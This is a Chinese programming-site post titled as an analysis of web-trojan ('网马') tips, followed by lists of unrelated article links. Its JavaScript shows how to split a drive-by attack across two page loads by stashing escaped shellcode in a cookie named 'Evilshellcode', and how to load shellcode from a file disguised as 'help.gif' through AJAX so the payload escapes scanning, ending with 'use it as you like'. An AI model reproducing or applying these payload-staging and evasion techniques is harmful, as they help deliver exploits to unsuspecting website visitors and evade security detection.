编程 Javascript

一个网马的tips实现分析

Posted in Javascript onNovember 28, 2010

cookie示例代码：

//存放 
function setCookie(sVar, sVal){ 
theCookie = sVar + '=' + sVal + '; expires=Fri, 1 Jul 2020 09:45:27 UTC'; 
document.cookie = theCookie;} 
shellcode="%9090%9090%00e8%0000%5e00%8b64%303d%0000%8100%00c7%0008%8b00%83c7%1dc0%20b9%0001%a500%fde2%e0ff%00e8%0000%6a00%eb08%1b6c%46c6%ed79%ef56%9836%8afe%aa0e%0dfc%9e7c%bbf9%b035%2d49%7edb%e2d8%8e73%0e4e%75ec......" 
setCookie('Evilshellcode', shellcode); 
//取出 
function getCookie(sVar){ 
cookies = document.cookie.split('; '); 
for(var i = 1; i <= cookies.length; i++){ 
if(cookies[i - 1].split('=')[0] == sVar){return cookies[i - 1].split('=')[1];}} 
return ''; 
} 
a=unescape(getCookie('Evilshellcode'))

cookie存放的话，可以挂两次，第一次挂cookie写入代码无害，第二次再取出来结合新挂的代码来运行。怎么用随你了。

ajax来调用

<script src="http://jqueryjs.googlecode.com/files/jquery-1.3.2.min.js" type="text/javascript"></script> 
var shellcode = $.ajax({ 
url: "help.gif", 
async: false 
}).responseText

help.gif内容

%9090%9090%00e8%0000%5e00%8b64%303d%0000%8100%00c7%0008%8b00%83c7%1dc0%20b9%0001%a500%fde2%e0ff%00e8%0000%6a00%eb08%1b6c%46c6%ed79%ef56%9836%8afe%aa0e%0dfc%9e7c%bbf9%b035%2d49%7edb%e2d8%8e73%0e4e%75ec

一个网马的tips实现分析

声明：登载此文出于传递更多信息之目的，并不意味着赞同其观点或证实其描述。

Javascript 相关文章推荐

9个javascript语法高亮插件推荐

Jul 18 Javascript

JavaScript DOM学习第六章表单实例

Feb 19 Javascript

js统计页面的来访次数实现代码

May 09 Javascript

jquery用data方法获取某个元素上的事件

Jun 23 Javascript

node.js中的fs.utimesSync方法使用说明

Dec 15 Javascript

jQuery幻灯片特效代码分享--鼠标滑过按钮时切换（2）

Nov 18 Javascript

AngularJS $on、$emit和$broadcast的使用

Sep 05 Javascript

jquery实现图片上传前本地预览

Apr 28 jQuery

element-ui中select组件绑定值改变,触发change事件方法

Aug 24 Javascript

webpack打包多页面的方法

Nov 30 Javascript

修改layui的后台模板的左侧导航栏可以伸缩的方法

Sep 10 Javascript

关于angular浏览器兼容性问题的解决方案

Jul 26 Javascript

JQUBAR1.1 jQuery 柱状图插件发布

Nov 28 #Javascript

为jQuery增加join方法的实现代码

Nov 28 #Javascript

Jquery拖拽并简单保存的实现代码

Nov 28 #Javascript

jquery下将选择的checkbox的id组成字符串的方法

Nov 28 #Javascript

用jquery设置按钮的disabled属性的实现代码

Nov 28 #Javascript

IE6弹出“已终止操作”的解决办法

Nov 27 #Javascript

javascript 获取所有id中包含某关键字的控件的实现代码

Nov 25 #Javascript

You might like

header()函数使用说明

2006/11/23 PHP

Mysql数据库操作类( 1127版，提供源码下载 )

2010/12/02 PHP

PHP实现的简单日历类

2014/11/29 PHP

php导入模块文件分享

2015/03/17 PHP

php mysql获取表字段名称和字段信息的三种方法

2016/11/13 PHP

PHP 搜索查询功能实现

2016/11/29 PHP

JQuery1.4+ Ajax IE8 内存泄漏问题

2010/10/15 Javascript

jquery 模板的应用示例

2013/11/12 Javascript

解析jQuery的三种bind/One/Live事件绑定使用方法

2013/12/30 Javascript

jQuery响应enter键的实现思路

2014/04/18 Javascript

Jquery仿IGoogle实现可拖动窗口示例代码

2014/08/22 Javascript

AngularJS 自定义指令详解及示例代码

2016/08/17 Javascript

浅谈js中test()函数在正则中的使用

2016/08/19 Javascript

基于Javascript实现文件实时加载进度的方法

2016/10/12 Javascript

设置jquery UI 控件的大小方法

2016/12/12 Javascript

详谈javascript精度问题与调整

2017/07/08 Javascript

微信小程序自定义消息提示框

2017/08/06 Javascript

详解Vue中CSS样式穿透问题

2019/09/12 Javascript

基于JavaScript伪随机正态分布代码实例

2019/11/07 Javascript

[15:39]教你分分钟做大人：龙骑士

2014/10/30 DOTA

[00:12]2018DOTA2亚洲邀请赛 Sccc亮相SOLO赛，今年他又会有什么样的战绩？

2018/04/06 DOTA

Python入门篇之数字

2014/10/20 Python

python3简单实现微信爬虫

2015/04/09 Python

Selenium鼠标与键盘事件常用操作方法示例

2018/08/13 Python

详解如何管理多个Python版本和虚拟环境

2019/05/10 Python

Python数据结构dict常用操作代码实例

2020/03/12 Python

python新手学习使用库

2020/06/11 Python

Python使用sys.exc_info()方法获取异常信息

2020/07/23 Python

Python sqlalchemy时间戳及密码管理实现代码详解

2020/08/01 Python

CSS3实现闪烁动画效果的方法

2015/02/09 HTML / CSS

C++面试题目

2013/06/25 面试题

Unix如何添加新的用户

2014/08/20 面试题

留学推荐信怎么写

2014/01/25 职场文书

售后前台接待岗位职责

2015/04/03 职场文书

运动会开幕式致辞

2015/07/29 职场文书

python 如何获取页面所有a标签下href的值

2021/05/06 Python